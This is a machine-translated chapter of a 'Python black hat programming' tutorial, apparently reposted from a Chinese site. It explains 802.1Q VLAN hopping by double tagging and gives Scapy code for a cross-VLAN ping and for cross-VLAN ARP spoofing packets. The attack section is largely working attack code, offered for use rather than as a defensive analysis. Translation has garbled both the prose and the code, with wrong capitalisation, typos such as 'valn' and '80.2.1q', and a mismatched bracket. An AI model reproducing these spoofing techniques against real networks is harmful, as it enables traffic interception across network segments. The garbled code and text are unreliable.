VLAN (virtual local area network), is based on the Ethernet interactive technology to build a fictitious network, can either divide the same physical network into multiple valn, can also cross the physical network barriers, users in different subnets to the same VLAN. Figure 2 is an example of a VLAN partition.
Figure 2
There are many ways to implement VLANs, based on the VLAN division of switching devices, there are generally two kinds:
• Switch-based port partitioning
• Extended Ethernet frame format based on IEEE 802.1q protocol
Based on the second tier of VLAN technology, there is a trunking concept that trunking is used to connect between different switches to ensure that members of the same VLAN that are built across multiple switches can communicate with each other. The ports used for interconnection between switches are called trunk ports. In addition to 80.2.1q, Cisco has its own trunk protocol called ISL.
Figure 3
Figure 3 is 802.1q packet, and ordinary Ethernet frame is not the essential difference, just add a VLAN Tag. The red part of the VLAN identifier identifies which VLAN a packet belongs to, thus ensuring that the range of data broadcasts does not span the VLAN.
Now do simple thinking, want to cross VLAN communication, is not just modify the data packet in the identifier it can do?
3.4.1 VLAN Hopping
Based on the above analysis, we consider a simple scenario: across vlanping, send a ping request from a Vlan1 host to a host in Vlan2.
Before coding, we have to solve the problem of VLAN packet construction, in Scapy we use the Dot1q class to construct the tag part in Figure 3. As shown in Figure 4.
Figure 4
Here we can write a cross VLAN ping request.
#!/usr/bin/python from
scapy.all import *
packet = ether (dst= "c0:d3:de:ad:be:ef")/\
dot1q (vlan=1)/\
dot1q (vlan=2)/\
IP (dst= "192.168.13.3")/\
ICMP ()
SENDP (packet)
The code above specifies the target host's Mac and IP address, adds two VLAN identities, the first is the VLAN where the data is sent, and the second is the VLAN on which the target host resides. The switch removes the first identity and forwards the packet to the target host when it reads the second identity.
3.4.2 Cross-VLAN ARP spoofing
3.1, 3.2 and 3.3 We are all talking about ARP spoofing, because the VLAN limits the broadcast domain, our previous code is unable to ARP spoofing across the VLAN. But it is also easy to solve this problem by inserting the VLAN ID into the ARP spoofing data we constructed earlier. The following code is the code where we construct the ARP Request packet in section 3.1.
Def build_req ():
if Options.target is None:
pkt = ether (Src=mac, dst= ' ff:ff:ff:ff:ff:ff ')/ARP (Hwsrc=mac, psrc= Args[0], pdst=args[0])
elif options.target:
target_mac = Getmacbyip (options.target)
if Target_mac is None :
print [-] error:could not resolve targets MAC address
sys.exit (1)
pkt = ether (Src=mac, Dst=target_mac)/ ARP (Hwsrc=mac, psrc=args[0], Hwdst=target_mac, pdst=options.target) return
PKT
In the part of constructing the packet, we insert the VLAN identification:
PKT = Ether (Src=mac, Dst=target_mac)/dot1q (Vlan=our_vlan)/dot1q (Vlan=target_vlan)/ARP (Hwsrc=mac, Psrc=args[0), Hwdst=target_mac, Pdst=options.target)
This enables ARP spoofing across VLANs.
Summary of 3.4.3
This section mainly discusses how to construct spoofed VLAN packets to achieve the purpose of cross VLAN data communication and ARP spoofing. It is important to note that the approach in this article is primarily for the 802.1Q protocol, which has no effect on the VLAN that is physically isolated from the port.
The above is a small set to introduce Python black hat programming 3.4 across the VLAN detailed, I hope to help you, if you have any questions please give me a message, small series will promptly reply to everyone. Here also thank you very much for the cloud Habitat Community website support!